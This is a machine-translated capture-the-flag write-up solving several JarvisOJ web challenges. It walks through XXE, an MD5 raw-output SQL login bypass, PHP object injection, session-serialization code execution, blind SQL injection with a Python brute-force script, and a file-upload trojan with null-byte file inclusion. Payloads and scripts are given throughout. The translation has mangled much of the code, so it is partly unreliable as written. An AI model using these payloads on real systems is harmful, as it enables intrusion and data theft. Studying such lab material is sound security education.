JARVISOJ Platform Web topic simple Part writeup tutorial

After the page is accessed, the page displays:

Please use the port visit this site.

At that time saw this also thought is needs to visit this website 51 ports, but this website has already determined is accesses the 32770 port, later has not thought. The last discovery was that the local port of 51 was required to access the site. Payload is as follows:

Curl--local-port Wuyi http://web.jarvisoj.com:32770/
Finally, we can get flag.

API call

Topic Link: http://web.jarvisoj.com:9882/

Topic Tip:

Please try to get the flag value in the target machine/home/ctf/flag.txt.

After accessing the connection, view the Web page source code.

function Send () {
Evil_input = document.getElementById ("Evil-input"). Value;
var xhr = XHR ();
Xhr.open ("Post", "/api/v1.0/try", true);
Xhr.onreadystatechange = function () {
if (xhr.readystate==4 && xhr.status==201) {
data = Json.parse (Xhr.responsetext);
Tip_area = document.getElementById ("Tip-area");
Tip_area.value = Data.task.search+data.task.value;
}
};
Xhr.setrequestheader ("Content-type", "Application/json");
Xhr.send (' {search ': ' +evil_input+ ', ' value ': ' Own '} ');
}
Found this page is only to send requests to the background, and the input of the front desk does not matter.

The data returned in the background shows:

http/1.0 201 CREATED
Content-type:application/json
Content-length:86
server:werkzeug/0.9.4 python/2.7.6
date:wed, OCT 2016 05:34:05 GMT
Just know that the background is written in Python. In addition, there is no extra information.

Finally know that this is a so-called XXe vulnerability, XXe vulnerability of the relevant concepts can refer to the PHP Framework Slim Architecture XXe vulnerability of this article, the principle of very detailed.

Knowing that the XXe is a vulnerability, the final payload is as follows:

This loophole is also the first heard, have time to study and then write a detailed article to explain it

How to use Python to implement a XXe vulnerability XML entity injection XXE

About the harm of XXe can refer to the article unknown attack to know how to prevent--xxe loopholes attack

Login

Topic Link: http://web.jarvisoj.com:32772/

Topic Tip:

Need a password to get flag oh.

Landing Page view, found that only a page needs to enter the password input box, no other prompts, casually enter the password after the display wrong Password. , see this situation as a SQL injection, but by typing illegal characters, it appears that there is no filtering, always showing wrong Password. Finally, a hint was found by looking at the response package:

Hint: "SELECT * from ' admin ' where password= '". MD5 ($pass, true). "'"
Knowing MD5 ($pass, True) is the key to finding this article. The input string Ffifdyop to get the final password.

The Secret of the God Shield Bureau

Topic Link: http://web.jarvisoj.com:32768/

Topic Tip:

There is a secret entrance to the inner network of the aegis, can you find the secret of the Shield bureau through the loophole?

Access to the link, get is a picture, through the burp grab bag, found in the Midway visit the URL http://web.jarvisoj.com:32768/showimg.php?img=c2hpZWxkLnBocA==, see the link is a file read, The filename is encrypted using base64.

Read the contents of the showimg.php:

<?php
$f = $_get[' img '];
if (!empty ($f)) {
$f = Base64_decode ($f);
if (Stripos ($f, '.. ') ===false && Stripos ($f, '/') ===false && stripos ($f, ' \ ') ===false
&& Stripos ($f, ' PCTF ') ===false) {
ReadFile ($f);
} else {
echo "File not found!";
}
}
?>
Ordinary content, there is no information related to flag.

Try to read the index.php information:

<?php
Require_once (' shield.php ');
$x = new Shield ();
Isset ($_get[' class ']) && $g = $_get[' class '];
if (!empty ($g)) {
$x = Unserialize ($g);
}
echo $x->readfile ();
?>
Index.php also did not appear with flag-related information, but index.php the value of the class parameter read and did not filter the parameters.

Read shield.php information:

<?php
Flag is in pctf.php
Class Shield {
public $file;
function __construct ($filename = ' ") {
$this-> file = $filename;
}

function ReadFile () {
if (!empty ($this->file) && stripos ($this->file, ' ... ') ===false
&& Stripos ($this->file, '/') ===false && stripos ($this->file, ' \ \ ') ==false) {
Return @file_get_contents ($this->file);
}
}
}
?>
Describes the flag in pctf.php, combined with the index.php source code. Get the final flag information. But we need an instance of the Shield class $x, and the file attribute in the instance $x is pctf.php. But the current code can't do that. But thought for a long time did not think, finally consulted 40huo. Finally know the need to build a local environment, the example of the sequence of words.

index.php
<?php
Require_once (' shield.php ');
$x = new Shield ();
Echo Serialize ($x);
?>
shield.php

<?php
Flag is in pctf.php
Class Shield {
public $file;
function __construct ($filename = ' pctf.php ') {
$this-> file = $filename;
}
function ReadFile () {
if (!empty ($this->file) && stripos ($this->file, ' ... ') ===false
&& Stripos ($this->file, '/') ===false && stripos ($this->file, ' \ \ ') ==false) {
Return @file_get_contents ($this->file);
}
}
}
?>
The most critical code is to assign $filename to pctf.php when initialization is performed.

function __construct ($filename = ' pctf.php ') {
$this-> file = $filename;
}
The value of the resulting sequence is:

O:6: "Shield": 1:{s:4: "File"; S:8: "pctf.php";}
Last access to url:http://web.jarvisoj.com:32768/index.php?class=o:6:%22shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}
Page return:

<?php
Ture FLAG:PCTF{W3LCOME_TO_SHI3LD_SECRET_AR3A}
Fake flag:
echo "FLAG:PCTF{I_4M_NOT_FL4G}"
?>
PHPINFO

Topic Address: http://web.jarvisoj.com:32784/

Visit the Web site, the page shows:

<?php
//a Webshell is wait for you
Ini_set (' Session.serialize_handler ', ' php ');
Session_Start ();
Class Oowoo
{
    public $mdzz;
    function __construct ()
  & nbsp {
        $this->mdzz = ' phpinfo (); ';
   }
   
    function __destruct ()
    {
   & nbsp;    eval ($this->mdzz);
   }
}
if (Isset ($_get[' phpinfo '))
{
    $m = new Oowoo ();
}
Else
{
    highlight_string (file_get_contents (' index.php '));
}

To see the Ini_set (' Session.serialize_handler ', ' php ') in the PHP code will know that this topic is related to the problem with the session sequence in PHP. About the session in PHP problem, you can refer to my article. This is not a description of the session serialization.

If the vulnerability is to be triggered, a value that uses the php_serialize sequence is written to the server, and then the PHP engine is deserialized when accessing the index.php. But this does not provide a way to write session, but you can set the session to the server through the session Upload Progress. Specifically, when uploading a file, if post a variable named php_session_upload_progress, you can assign the value of filename to the session, the upload page is written as follows:

<form action= "http://121.42.149.60/68b329da9893e34099c7d8ad5cb9c940/index.php" method= "POST" enctype= " Multipart/form-data ">
<input type= "hidden" name= "php_session_upload_progress" value= "123"/>
<input type= "File" name= "file"/>
<input type= "Submit"/>
</form>
The file name that is uploaded is saved at the end of the session.

The following is a test of how php_session_upload_progress is written.

Locally, you need to assign a value to the $MDZZ and then execute the methods in $mdzz by using the eval () in the destructor.

Create a myindex.php locally

<?php
Ini_set (' Session.serialize_handler ', ' php_serialize ');
Session_Start ();
Class Oowoo
{
Public $mdzz = ' need to set method ';
function __construct ()
{
$this->mdzz = ' phpinfo (); ';
}

function __destruct ()
{
Echo $this->mdzz;
}
}
$obj = new Oowoo ();
Echo Serialize ($obj);
First set $mdzz = ' echo ' spoock '; ', the result of the final sequence is: o:5: "Oowoo": 1:{s:4: "Mdzz"; s:14: "Echo" Spoock ";". Then the filename needs to be set to | O:5: "Oowoo": 1:{s:4: "Mdzz"; s:14: "Echo" Spoock ";}, because the double quotation marks are escaped, the last actual file name is | O:5:\ "oowoo\": 1:{s:4:\ "mdzz\"; s:14:\ "echo \" Spoock\ "; \"; The final test results are:

You can see that the final results output the Spoock, indicating that the above tests were successful.

The next step is to get the flag.

To get the project path:

Get file path via DirName

Set $mdzz = ' Print_r (dirname (__file__)); '
The result of serialization is O:5: "Oowoo": 1:{s:4: "Mdzz"; s:27: "Print_r (DirName (__file__));";}
The file name is set to | O:5:\ "oowoo\": 1:{s:4:\ "mdzz\"; s:27:\ "Print_r (dirname (__file__)); \";}
The results appear as follows:

Get project path is in Opt/lampp/htdocs

Get file List

Get a list of files through Scandir

Set $mdzz= ' Print_r (Scandir ("/opt/lampp/htdocs")); '
The result of serialization is O:5: "Oowoo": 1:{s:4: "Mdzz"; s:38: "Print_r (Scandir ("/opt/lampp/htdocs "));";}
The file name is set to | O:5:\ "oowoo\": 1:{s:4:\ "mdzz\"; s:38:\ "Print_r (Scandir (\"/opt/lampp/htdocs\ ")); \";}
The results displayed are:

Found that there were here_1s_7he_fl4g_but_you_cannot_see.php.

Read the contents of the file:

Read the contents of a file through file_get_contents

Set $mdzz = ' O:5: "Oowoo": 1:{s:4: "Mdzz"; s:87: "Print_r (file_get_contents ("/opt/lampp/htdocs/here_1s_7he_fl4g_but_you _cannot_see.php "))";} '
Sequence results o:5: "Oowoo": 1:{s:4: "Mdzz"; s:88: "Print_r (file_get_contents ("/opt/lampp/htdocs/here_1s_7he_fl4g_but_you_ Cannot_see.php "));";}
The file name is set to | O:5:\ "oowoo\": 1:{s:4:\ "mdzz\" S:88:\ "Print_r (file_get_contents (\"/opt/lampp/htdocs/here_1s_7he_fl4g_but_you_ Cannot_see.php\ ")); \";} 。

Display results as:

Finally, we get flag.

Simple injection

It's a simple injection, everybody try?

Topic entrance: http://web.jarvisoj.com:32787/

Still prefer to do sqli topic.

When you visit the page, you get a landing page. By Burp, it is found that there is a hint in the response header or on the page, which means that this is indeed a common login SQL injection vulnerability.

Common types of landing vulnerabilities

Validate user name and password at the same time

$sql = select * from users where username= $usernmae and password= $password
$result = mysql_query ($sql);
if ($result) {
echo "landed success";
} else {
echo "Landing failed";
}
Step-by-Step authentication of user names, passwords

$sql = "Select password from users where username= ' $username '"
$result = mysql_query ($sql);
if ($result) {
$row = Mysql_fetch_row ($result);
$query _password = $row [$password];
To deform #对输入的 $password
$input _password = Modify ($PASSOWRD);
if ($input _password = = $query _password) {
echo "landed success";
} else {
echo "Password Error";
}

} else {
echo "User does not exist";
}
Subject

Attempt to use username=admin&password=123456, page return password error
Attempt to use username=user&password=123456, page return username error
Then the authentication method is to use the user name and password step-by-step verification.

Idea Validation

Using Username=admin ' #&password=123456, the page returns a password error, stating that the background did not filter # and '.
Using Username=admin ' or 1=1#&password=123456, the page returns a username error, which filters some of the content in admin ' or 1=1# on the background. The filtered content may or may not be a space.
Using Username=user '/**/or/**/1=1#&password=123456, the page returns a password error, stating that the input SQL statement can be executed, which also indicates that the background is just filtering the space.
Summing up, username exists SQL injection, and just filters the spaces, so it's a blind
Poc

The entire POC is an error-based blind step, and the specific method can be referred to in the article.

Lookup table, Username=user '/**/or/**/exists (select/**/*/**/from/**/admin) #&password=123456, page return password error, then the existence of a database Admin table
lookup field Username=user '/**/or/**/exists (select/**/username,password/**/from/**/admin) #&password=123456, page return password error To indicate that there are username and password fields in the admin table.
Username=user '/**/or/**/exists (Select/**/count (*)/**/from/**/admin) #&password=123456, page return password error, description in admin There's only one record in the table, so it's a good thing to do.
Get password length, Username=user '/**/or/**/(select/**/length (password)/**/from/**/admin) >10#&password=123456, Through the two-point heuristic, it is found that the password field length is 32 bits, which indicates that it is possible to use the MD5 method to encrypt.
After determining the length of the password, the next step is to use Python for blasting.

Import requests

Def get_data ():
result = ""
url = ' http://web.jarvisoj.com:32787/login.php '
Payload = {
"username": ' xx ',
"Password": 1,
}
Username_template = "'/**/or/**/ascii (substr (select/**/password/**/from/**/admin), {0},1)) >{1}#"
chars = ' 0123456789@abcdefghijklmnopqrstuvwxyz_abcdefghijklmnopqrstuvwxyz '
For I in Range (1,33):
For Char in chars:
Char_ascii = Ord (char)
Username = Username_template.format (i,char_ascii)
payload[' username '] = Username
Response = Requests.post (url,data=payload)
length = Len (response.text)
# print (length)
#返回的长度只有1191和1192
If length>1191:
Print (char)
result = Char
Break
Print (Result)

Get_data ()
Finally, the value of password is 334CFB59C9D74849801D5ACDCFDAADC3.

When you get the plaintext of the password, the input can be flag.

PoC2

After determining the password length of 32 bits, that is, the MD5 () encryption method, you can use the following POC

Username=user '/**/union/**/select/**/' c4ca4238a0b923820dcc509a6f75849b ' #&password=1
So you can get the payload directly.

Easy Gallery

"There is no protection is a loophole can not solve, if there is, then ..."

Topic entrance: http://web.jarvisoj.com:32785/

See the topic, found that this is an uploaded topic, then need to use to upload around.

File Upload

Upload, found that the background is not through the file suffix to judge, but also to the file of the MIME to judge, then must upload a picture of a Trojan horse.

File browsing

found that the picture Trojan can be uploaded, the last is to browse the image of the trojan carried out, upload pictures, the whole process of image browsing is as follows:

After uploading the image, you will get the image ID after uploading, and then enter the picture ID and the type of picture in the view, you can browse the picture, and finally find the link of the picture's visit is actually http://web.jarvisoj.com:32785/uploads/picture id.jpg

Connection Trojan

See here, I thought is a different file Trojan, direct use of Chinese kitchen knife can be connected, and then found that Chinese kitchen knife can not connect, the background to the kitchen knife was bypassed, try not to use a kitchen knife to carry out the Trojan, found that there is no use, uploads/picture id.jpg can not be executed.

file contains

You cannot use a chopper, you must use a different method.

When you access the Submit, View page, the link to the page access is:

Http://web.jarvisoj.com:32785/index.php?page=submit
Http://web.jarvisoj.com:32785/index.php?page=view
There may be a file inclusion vulnerability here, try:

Http://web.jarvisoj.com:32785/index.php?page=view '
Page error

Warning:fopen (View '. php): Failed to open stream:no such file or directory in/opt/lampp/htdocs/index.php on line 24
No such file!
Indicates a file access vulnerability does exist

Reading pictures

When a file is read, the background appends the page parameter with the file suffix. php, so you need to use%00 for truncation.

When you try to read a file using a file-containing vulnerability,

yun_qi_img/Picture id.jpg%00
The page shows you should does this!.

The background to the background of the <?php Phpcode?> filter, then need to adopt a new bypass way, this topic and Baidu CTF upload topic a bit similar, consider using <script language= "PHP" >phpcode;</script> the way to execute PHP code

Poc

The final PHP code is written as:

<script language= "PHP" >phpinfo ();</script>
The above PHP code made into a picture of a Trojan horse, and then use the file contains vulnerabilities to read the picture,

yun_qi_img/Picture id.jpg%00